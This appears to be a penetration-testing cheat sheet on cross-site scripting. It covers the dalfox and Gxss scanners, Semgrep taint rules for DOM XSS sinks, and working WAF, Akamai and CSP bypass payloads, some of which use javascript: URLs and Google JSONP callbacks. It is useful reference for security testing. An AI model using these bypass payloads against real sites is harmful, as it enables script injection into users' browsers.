caon.io
Toggle Dark/Light/Auto mode Toggle Dark/Light/Auto mode Toggle Dark/Light/Auto mode Back to homepage

XSS

# https://github.com/hahwul/dalfox
dalfox url http://example.com
cat urls | dalfox pipe -  --skip-bav --skip-mining-all

Find reflected parameters that could lead to XSS with Gxss

# https://github.com/KathanP19/Gxss
cat list | Gxss -c 100 -p REPLACE_STRING

Semgrep

Semgrep can be used to detect sink and sources and assist in XSS detection.

Usage

Download javascript files and beautify them (See Javascript), then run semgrep with

semgrep -c xss.yaml scripts/*

Hold down!

Javascript files must be beautified, otherwise semgrep will no work properly.

rules:
  - id: domxss-insertAdjacentHTML
    languages:
      - javascript
      - typescript
    message: Found dangerous HTML output
    pattern-either:
      - pattern: document.location.search = ...
      - pattern: document.location.hash = ...
      - pattern: document.location.pathname = ...
      - pattern: window.location.search = ...
      - pattern: window.location.hash = ...
      - pattern: window.location.pathname = ...
      - pattern: document.URL = ...
      - pattern: document.documentURI = ...
      - pattern: document.baseURI = ...
      - pattern: document.cookie = ...
      - pattern: document.referrer = ...
      - pattern: $X.insertAdjacentHTML(...)
      - pattern: $X.innerHTML(...)
      - pattern: $X.innerHTML = ...
      - pattern: eval(...)
      - pattern: execScript
      - pattern: script.src = ...
      - pattern: iframe.src = ...
      - pattern: document.location = ...
      - pattern: window.location = ...
      - pattern: document.location.href = ...
      - pattern: window.location.href = ...
      - pattern: document.write(...)
      - pattern: document.writeln(...)
      - pattern: $X.outerHTML = ...
      - pattern: $X.outerHTML(...)
    severity: WARNING
rules:
  - id: domxss-insertAdjacentHTML
    languages:
      - javascript
      - typescript
    message: Found dangerous HTML output
    mode: taint
    pattern-sources:
      - pattern: document.location.search
      - pattern: document.location.hash
      - pattern: document.location.pathname
      - pattern: document.location.href
      - pattern: document.location
      - pattern: window.location
      - pattern: window.location.href
      - pattern: window.location.search
      - pattern: window.location.hash
      - pattern: window.location.pathname
      - pattern: document.URL
      - pattern: document.documentURI
      - pattern: document.baseURI
      - pattern: document.cookie
      - pattern: document.referrer
    pattern-sinks:
      - pattern: $X.insertAdjacentHTML(...)
      - pattern: $X.innerHTML(...)
      - pattern: $X.innerHTML = ...
      - pattern: eval(...)
      - pattern: execScript
      - pattern: script.src = ...
      - pattern: iframe.src = ...
      - pattern: document.location = ...
      - pattern: window.location = ...
      - pattern: document.location.href = ...
      - pattern: window.location.href = ...
      - pattern: document.write(...)
      - pattern: document.writeln(...)
      - pattern: $X.outerHTML = ...
      - pattern: $X.outerHTML(...)
    severity: WARNING

Markdown

Markdown parsers can lead to XSS

Bypass

Try to encode characters with unicode to achieve WAF bypass

alert(1) would become ale\u{72}t(1\x29, where

\u{72} is unicode to r \x29 is unicode to )

Akamai Bypass

Sometimes works:

"><a/\test="%26quot"href=%27javascript:/**/;\ale\u{72}t(11111\x29");%27>Click
"><a/\test="%26quot;x%26quot;"href=%27javascript:/**/;location.assign("google.com")%27>Click</a>

Enconding

CSP Bypass

If the site has google whitelisted, the following could be used:

www.google.com/complete/search?client=chrome&q=1&jsonp=alert(1)//
accounts.google.com/o/oauth2/revoke?callback=alert(1)

Safari

javascript://trusted.example.com/%0Aalert()

Cool resources